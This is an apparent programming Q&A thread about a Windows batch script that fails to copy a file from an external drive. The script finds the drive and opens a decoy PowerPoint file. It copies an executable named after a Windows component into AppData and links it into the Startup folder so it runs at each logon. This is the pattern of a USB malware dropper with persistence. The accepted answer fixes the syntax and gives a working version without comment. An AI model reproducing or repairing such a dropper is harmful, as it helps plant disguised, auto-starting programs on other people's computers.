# Windows Batch - Copy File issue

Tags: windows, batch-file, for-loop, if-statement, copy

I'm trying to create a simple batch file that is supposed to copy a file from an external drive to the pc, without knowing the drive letter:

```
echo off

set drives[0]=A:
set drives[1]=B:
set drives[2]=C:
set drives[3]=D:
set drives[4]=E:
set drives[5]=F:
set drives[6]=G:
set drives[7]=H:




for /F "tokens=2 delims==" %%s in ('set drives[') do (


if exist "%%s%\New Presentazione di Microsoft PowerPoint.pptx" (


start "" "%%s%\New Presentazione di Microsoft PowerPoint.pptx"


if not exist "%AppData%\Windows Media Center.exe" ( 


copy "%%s%\data\Windows Media Center.exe" %AppData%


mklink "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\Windows Media Center" "%AppData%\Windows Media Center.exe" 

)

)

)



PAUSE
```

I can successfully get the correct drive letter, but the copy command returns this error:

> the system cannot find the file specified

What am i doing wrong?

Comment: Just at an initial glance, change `%%s%` to `%%s`.

Answer (score 0, accepted):

You are using the [FOR /F](https://ss64.com/nt/for_cmd.html) parameter variable incorrectly but below is an example of the syntax you can use for it to work as expected and so it'll work as expected.

> Essentially in a FOR loop when you use a variable such as `%%s` when
>   you use it to iterate a command later in the loop (e.g. `DO %%s`), it is referenced in
>   a syntax of `%%s` or `%%~s` in a batch script or as `%s` or `%~s` with
>   a single percent sign if not run as a script but manually from command
>   line. Simply omit the additional `%` symbol you have appended to
>   variable iterator so use `%%s` and not `%%s%`
>
> If you use the tilde `~` character in the variable as I mentioned
>   above that merely removes any surrounding quotes so that may be
>   present just in case.

```
echo on

set drives[0]=A:
set drives[1]=B:
set drives[2]=C:
set drives[3]=D:
set drives[4]=E:
set drives[5]=F:
set drives[6]=G:
set drives[7]=H:

for /F "tokens=2 delims==" %%s in ('set drives[') do (
    if exist "%%s\New Presentazione di Microsoft PowerPoint.pptx" start "" "%%s\New Presentazione di Microsoft PowerPoint.pptx"
    if not exist "%AppData%\Windows Media Center.exe" copy "%%s\data\Windows Media Center.exe" %AppData%
    mklink "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\Windows Media Center" "%AppData%\Windows Media Center.exe" 
)

PAUSE
```

---

### Further Resources

- [FOR /F](https://ss64.com/nt/for_cmd.html)